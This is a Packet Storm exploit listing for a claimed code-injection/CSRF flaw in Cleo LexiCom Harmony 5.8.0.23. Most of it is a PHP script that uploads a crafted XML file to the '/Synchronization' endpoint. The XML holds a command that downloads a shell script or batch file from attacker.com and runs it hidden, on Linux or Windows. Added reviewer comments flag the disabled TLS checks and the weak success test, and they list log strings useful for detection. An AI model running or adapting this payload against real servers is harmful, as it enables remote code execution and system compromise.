## https://sploitus.com/exploit?id=PACKETSTORM:189629
=============================================================================================================================================
| # Title : Cleo LexiCom Harmony 5.8.0.23 PHP Code Injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits) |
| # Vendor : https://cleo.com |
=============================================================================================================================================
POC :
[+] Dorking in Google or other search engine.
[+] Uploads a malicious XML file that can execute shell commands on the target.
Exploits CSRF to execute unauthorized commands via the application.
[+] save code as poc.php .
[+] Usage : cmd => c:\www\test\php poc.php
[+] Set target = Line : 34 + 39 + 68
[+] PayLoad :
<?php
/**
 * Issue a single HTTP request through cURL and hand back the raw result.
 *
 * Security note: CURLOPT_SSL_VERIFYPEER is switched off below, so the peer
 * certificate is never validated when $url is an HTTPS address.
 *
 * @param string $url     Address to request.
 * @param mixed  $data    Passed unchanged to CURLOPT_POSTFIELDS; only used
 *                        when $method compares equal to 'POST'.
 * @param array  $headers Raw header lines for CURLOPT_HTTPHEADER; skipped
 *                        when empty.
 * @param string $method  'POST' turns the request into a POST; any other
 *                        value leaves cURL's default method in place.
 *
 * @return string|bool Whatever curl_exec() returns: the response body, or
 *                     false when the transfer fails.
 */
function sendRequest($url, $data = null, $headers = [], $method = 'GET') {
    $handle = curl_init();

    // Options are collected first and applied in the same order as before.
    $options = [
        CURLOPT_URL            => $url,
        CURLOPT_RETURNTRANSFER => true,   // return the body instead of printing it
        CURLOPT_SSL_VERIFYPEER => false,  // certificate validation disabled
    ];

    if ($headers) {
        $options[CURLOPT_HTTPHEADER] = $headers;
    }

    if ($method == 'POST') {
        $options[CURLOPT_POST] = true;
        $options[CURLOPT_POSTFIELDS] = $data;
    }

    curl_setopt_array($handle, $options);

    $result = curl_exec($handle);
    curl_close($handle);

    return $result;
}
// Exploit CSRF to upload a malicious file to the server
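/**
 * Build and send the proof-of-concept upload, then print a one-line verdict.
 *
 * What the code does, as visible here:
 *  - wraps an XML document (a <Host> element holding one <Command> CDATA
 *    section) in a hand-built multipart/form-data body, as a part named
 *    "file" with filename "exploit.xml" and type application/xml;
 *  - POSTs it to "$target/Synchronization" via sendRequest(), adding the
 *    header "VLSync: Multipart;l=0,Acknowledge";
 *  - reports success only if the response body contains "Success".
 *
 * Reviewer notes:
 *  - Despite the function name, the request is sent directly by this
 *    script; no victim browser or session is involved in this code.
 *  - The substring check says nothing about whether the embedded command
 *    ran on the target; it only reflects the text of the HTTP response.
 *  - The attacker.com URLs in the command are placeholders from the
 *    original listing.
 *  - For detection, the request path, the VLSync header value, the upload
 *    filename and the <Command> element are the fixed strings this PoC
 *    puts on the wire and are what to search web/proxy logs for.
 *
 * The original comment inside this function was mis-encoded and had spilled
 * onto lines without a comment marker, which made the listing unparseable;
 * it is restored below as a single English comment. No runtime string was
 * changed.
 *
 * @param string $target Scheme and host (no trailing slash) of the server
 *                       the request is sent to.
 *
 * @return void Output is written with echo.
 */
function exploitCSRF($target) {
    // Multipart boundary; it only has to be unlikely to occur in the body.
    $boundary = "------------------------" . md5(rand(0, 99999));

    // Support for both Windows and Linux (translated from the original comment).
    $payload = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n";
    $payload .= "<Host>\n";
    $payload .= " <Command><![CDATA[\n";
    $payload .= " if [ \"\$(uname -s)\" = \"Linux\" ]; then\n";
    $payload .= " wget http://attacker.com/shell.sh -O /tmp/shell.sh;\n";
    $payload .= " chmod +x /tmp/shell.sh;\n";
    $payload .= " /tmp/shell.sh;\n";
    $payload .= " else\n";
    $payload .= " powershell -NoProfile -ExecutionPolicy Bypass -Command \"";
    $payload .= " Invoke-WebRequest -Uri 'http://attacker.com/shell.bat' -OutFile 'C:\\\\Windows\\\\Temp\\\\shell.bat'; ";
    $payload .= " Start-Process -FilePath 'C:\\\\Windows\\\\Temp\\\\shell.bat' -WindowStyle Hidden\";\n";
    $payload .= " fi\n";
    $payload .= " ]]></Command>\n";
    $payload .= "</Host>";

    // Hand-assembled multipart/form-data body holding the single file part.
    $postData = "--$boundary\r\n";
    $postData .= "Content-Disposition: form-data; name=\"file\"; filename=\"exploit.xml\"\r\n";
    $postData .= "Content-Type: application/xml\r\n\r\n";
    $postData .= $payload . "\r\n";
    $postData .= "--$boundary--\r\n";

    $headers = [
        "Content-Type: multipart/form-data; boundary=$boundary",
        "VLSync: Multipart;l=0,Acknowledge"
    ];

    $url = "$target/Synchronization";
    $response = sendRequest($url, $postData, $headers, 'POST');

    // Verdict is based purely on the response text, not on any observed effect.
    if (strpos($response, "Success") !== false) {
        echo "[+] Exploit sent successfully!\n";
    } else {
        echo "[-] Exploit failed!\n";
    }
}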
// Set the target (translated from the original comment). The address in the
// listing is the loopback interface.
$target = 'http://127.0.0.1';
exploitCSRF($target);
?>
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================